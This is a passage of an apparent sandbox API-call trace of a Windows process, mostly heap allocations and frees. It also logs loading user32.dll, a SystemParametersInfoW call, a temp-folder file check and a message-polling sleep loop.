RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0274.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0274.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0274.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0274.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0274.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0274.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0274.849] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0274.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0274.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0274.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0274.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69a28 [0274.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69a28, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0274.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0274.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0274.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0274.850] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0274.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0274.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0274.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0274.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0274.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0274.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0274.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0274.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0274.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0274.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0274.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0274.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0274.850] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0274.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0274.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0274.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0274.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0274.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0274.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0274.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0274.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0274.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0274.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0274.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0274.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0274.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0274.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0274.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0274.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0274.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0274.925] FreeLibrary (hLibModule=0x750c0000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0274.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0274.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0274.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0274.926] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0274.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0274.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0274.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0274.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0274.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0274.928] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0274.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0274.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0274.928] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0274.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0274.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0274.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0274.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0274.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0274.928] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0274.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0274.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0274.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0274.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0274.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0274.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0274.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0274.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0274.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0274.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0274.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0274.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0274.929] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0274.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0274.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0274.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0274.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0274.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0274.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0274.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0274.930] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0274.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0274.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0274.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0274.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0274.930] timeGetTime () returned 0x1184e97 [0274.930] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0274.930] Sleep (dwMilliseconds=0xa) [0275.000] timeGetTime () returned 0x1184edd [0275.000] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0275.000] Sleep (dwMilliseconds=0xa) [0275.083] timeGetTime () returned 0x1184f31 [0275.083] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0275.083] Sleep (dwMilliseconds=0xa) [0275.222] timeGetTime () returned 0x1184fbb [0275.222] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0275.222] Sleep (dwMilliseconds=0xa) [0275.446] timeGetTime () returned 0x118509b [0275.446] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0275.446] TranslateMessage (lpMsg=0x8cf798) returned 0 [0275.446] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0275.446] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0275.447] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0275.447] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0275.447] Sleep (dwMilliseconds=0xa) [0275.534] timeGetTime () returned 0x11850f3 [0275.534] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0275.534] Sleep (dwMilliseconds=0xa) [0275.609] timeGetTime () returned 0x118513f [0275.609] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0275.609] Sleep (dwMilliseconds=0xa) [0275.688] timeGetTime () returned 0x118518d [0275.688] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0275.688] Sleep (dwMilliseconds=0xa) [0275.834] timeGetTime () returned 0x118521f [0275.834] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0275.834] Sleep (dwMilliseconds=0xa) [0275.894] timeGetTime () returned 0x118525b [0275.895] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0275.895] Sleep (dwMilliseconds=0xa) [0275.946] timeGetTime () returned 0x1185290 [0275.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0275.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0275.947] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0275.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, 